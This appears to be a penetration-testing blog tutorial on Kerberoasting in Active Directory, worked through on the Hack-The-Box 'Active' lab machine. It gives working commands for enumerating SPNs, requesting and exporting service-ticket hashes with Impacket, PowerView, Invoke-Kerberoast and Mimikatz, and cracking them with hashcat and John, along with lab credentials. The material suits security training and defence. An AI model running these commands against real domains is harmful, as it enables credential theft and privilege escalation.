ACTIVE DIRECTORY — KERBEROS ATTACKS — PRIVILEGE ESCALATION
Attacking Service Accounts with Kerberoasting
Forge Service Tickets (TGS) with Kerberoasting MITRE ATT&CK ID: T1558.003, Active HTB machine
Today, we will discuss an old and well-known attack against Kerberos authentication during an Active Directory pentesting assessment called Kerberoasting. We will go over the attack overview, prerequisites, and the steps needed to conduct the attack. The demonstration steps will be on the Pentester Academy Active Directory Lab by Nikhil Mittal associated with the CRTP course and the Active machine on Hack-The-Box.
- Kerberoasting Overview
- Service Principal Name Role
- Attack Pre-requisites
- Demonstration Steps
The general concept of Kerberoasting is requesting service tickets (TGS) from the KDC (Kerberos Domain Controller) that are associated with service accounts to retrieve their hashes. Then, attempt to crack them offline with tools like Hashcat or John to recover the cleartext passwords to either escalate privileges vertically to become a local administrator or horizontally to access a set of different resources that can be used for pivoting within the network.
The service accounts can be linked to hosts like computers (CN=Computers) or domain users (CN=Users). Each service account can be mapped to a set of running services like MSSQL, Web, SharePoint, File shares, Exchange services, etc., within the domain known as Service Principal Names (SPNs).
📍Service Principal Name maps the host/user service accounts to running services.
Service Principal Names (SPNs)
The structure of an SPN consists of three (3) main parts: Service Class: the service type, i.e., SQL, Web, Exchange, File, etc., and the Host where the service is usually running in the format of FQDN (Fully Qualified Domain Name)and port number. For example, below, the Microsoft SQL service runs on the
dcorp-mgmt host on port 1443.
The SPN is
Since TGS tickets are encrypted with the service accounts, NTLM hashes by design, requesting a valid service account from the KDC is legitimate. However, the insecurity lies in the strength of the encrypted hash, which allows for brute-forcing attacks.
Kerberoasting works best against user service accounts configured with weak passwords, not the host-based computer accounts that use random 128 character passwords that are changed every 30 days.
🎯 The attack’s goal is to retrieve the cleartext passwords of service accounts to either escalate our privileges since most service accounts run with admin-related privileges or pivot laterally within the network.
- Credentials of a valid domain user service account (not a computer account).
- Service Principal Names of the services tied to the service user account.
- Service ticket (TGS) for the running service.
Since this is an assumed breach scenario, we have already obtained the credentials for the initial foothold for the service account user svc_tgs. Our goal is to escalate our privileges to an administrator by cracking the svc_tgs service ticket hash.
We first need to identify all the running services mapped to the service account and their privileges through the SPN attribute.
◼️Identify Service Principal Names
To identify the SPNs, we can use either the Impacket — GetUserSPN script or the PowerView from PowerSploit.
Run the Impacket GetUserSPN script with the domain name, service account username (svc_tgs), and password. As we see in the screenshot below, it returns one running service; the CIFS file sharing service associated with the svc_tgs account with Administrator privileges.
python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
We can achieve the same results on windows with PowerView with the command
Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname
If the group id returns in the 500s, the account has admin privileges.
◼️Request Service Tickets
The next step would be requesting a service ticket (TGS) for the service account. In Impacket, we can use the GetUserSPN script again with the flag
python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
As we see, the ticket KDC returns a valid TGS ticket to access the CIFS service as an administrator.
📌HackTricks Tip: If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it because of your local time, you need to synchronize the host with the DC: ntpdate <IP of DC>
We can also accomplish the same thing with PowerShell with
Add-Type cmdlet. We can specify which service we want to request a ticket for with the
Add-Type -AssemblyName System.IdentityModelNew -ObjectSystem.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Service class\Hostname:Port"
◼️ Export the Service Ticket
After acquiring the service ticket hash, save the ticket in a file to brute-force it offline with tools like John or Hashcat. We can do that in multiple ways:
In Impacket, we can export the ticket by adding the
-outputfile flag for output with the GetUserSPNs script.
python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -outputfile tgs_hashes.txt
We can also use the Invoke-Kerberoast script from PowerSploit. Download the script, import it locally with
Import-Module cmdlet, and run the script specifying the domain name and output format. In the below case, I chose the Hashcat format.
Import-Module .\invoke-kerberoast.ps1Invoke-Kerberoast -Domain active.htb -OutputFormat Hashcat | fl
For the Invoke-Mimikatz (PowerShell) script, use the
/export to save all the available Kerberos tickets locally on the desk.
Import-Module .\Invoke-Mimikatz.ps1Invoke-Mimikatz -Command '"kerberos::list /export"'
Then copy the ticket file to the desired location with the Copy-Item cmdlet.
Copy-Item TicketFile.kirbi C:\Path
◼️ Crack the Hashes Offline
Now that we have the hashes formatted correctly for the cracking tools, we start the cracking process.
hashcat -m 13100 --force <TGSs_file> <passwords_file>
and with John
john --format=krb5tgs --wordlist=<passwords_file> <ticket_file>
With that, we finished our post for today; we learned about the Kerberoasting attack and leveraged it to obtain the service account svc_tgs that is running with administrator’s permissions, and used the cracking tools (Hashcat/John) to get the cleartext password (Ticketmaster1968).
That’s all for today, and thanks a lot for stopping by 😃.
🔔 All of the used commands can be found at R3d-Buck3T — (Active Directory — Privilege Escalation — Kerberoasting Service Tickets)
Performing Kerberoasting without SPNs
Service principal names (SPNs) are records in an Active Directory (AD) database that show which services are registered…
Service Principal Name (SPN)
This article focuses on SPN (Service Principal Names) in order to understand what they are and how they are used. We…
Kerberoasting Active Directory Attack Explained - Blog | QOMPLX
This is the latest in a series of posts we're calling "QOMPLX Knowledge." These posts are intended to provide basic…
Add-event -AssemblyName SystemIdentityModel (from advanced Powershell logging) followed by a windows security event…
Kerberoasting is an attack that was discovered by Tim Medin in 2014, it allows a normal user in a Microsoft Windows…
Services that support Kerberos authentication require to have a Service Principal Name (SPN) associated to point users…
A Toast to Kerberoast - Black Hills Information Security
Derek Banks // This post will walk through a technique to remotely run a Kerberoast attack over an established…